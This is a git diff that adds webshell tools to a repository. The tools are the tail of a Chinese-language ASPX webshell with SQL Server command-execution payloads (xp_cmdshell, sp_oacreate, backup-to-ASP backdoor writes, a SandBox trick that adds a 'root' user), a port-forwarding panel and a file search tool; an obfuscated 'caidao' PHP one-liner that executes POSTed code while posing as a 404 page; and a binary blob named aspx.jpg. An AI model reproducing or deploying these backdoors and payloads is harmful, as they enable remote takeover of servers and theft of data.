'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
+</div>
+<table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
+<asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
+<div style="overflow-x:auto;width:950px" >
+<p>
+<asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
+</p>
+</div>
+</div>
+</div>
+<%--PortMap--%>
+<div id="hOWTm" runat="server">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<tr align="center">
+<td style="width:5%"></td>
+<td style="width:20%" align="left">本地Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
+<td style="width:20%" align="left">本地端口 : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
+<td style="width:20%" align="left">远程Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.on-e.cn"/></td>
+<td style="width:20%" align="left">远端口程 : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
+<tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="映射端口" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="清除所有" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="刷新" OnClick="tYoZ"/></td></tr></table></div>
+<%--Search--%>
+<div id="yhv" runat="server">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<tr align="center">
+<td style="width:20%" align="left">关键词</td>
+<td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
+<td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> 使用正则表达式</td>
+</tr>
+<tr align="center">
+<td style="width:20%" align="left">替换</td>
+<td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
+<td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> 替换</td>
+</tr>
+<tr align="center">
+<td style="width:20%" align="left">搜索文件类型</td>
+<td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
+<td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">文件名称</asp:ListItem><asp:ListItem Value="content" Selected="True">文件内容</asp:ListItem></asp:DropDownList></td>
+</tr>
+<tr align="center">
+<td style="width:20%" align="left">路径</td>
+<td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
+<td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="开始" /></td>
+</tr>
+</table>
+<br/>
+<br/>
+<asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
+</asp:Table>
+</div>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#003300;">Copyright &copy; 2009-2012 <a href="http://hi.baidu.com/%CE%E9%D7%D3%C7%C7/home" target="_blank">冰锋刺客</a> All Rights Reserved.</div></div>
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/caidao-shell/404.php b/caidao-shell/404.php
new file mode 100644
index 0000000..9944670
--- /dev/null
+++ b/caidao-shell/404.php
@@ -0,0 +1 @@
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
\ No newline at end of file
diff --git a/caidao-shell/aspx.jpg b/caidao-shell/aspx.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..b68fed95e9c8fa255d72e3f0b6ee1fb912e124e7
GIT binary patch
literal 9976
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
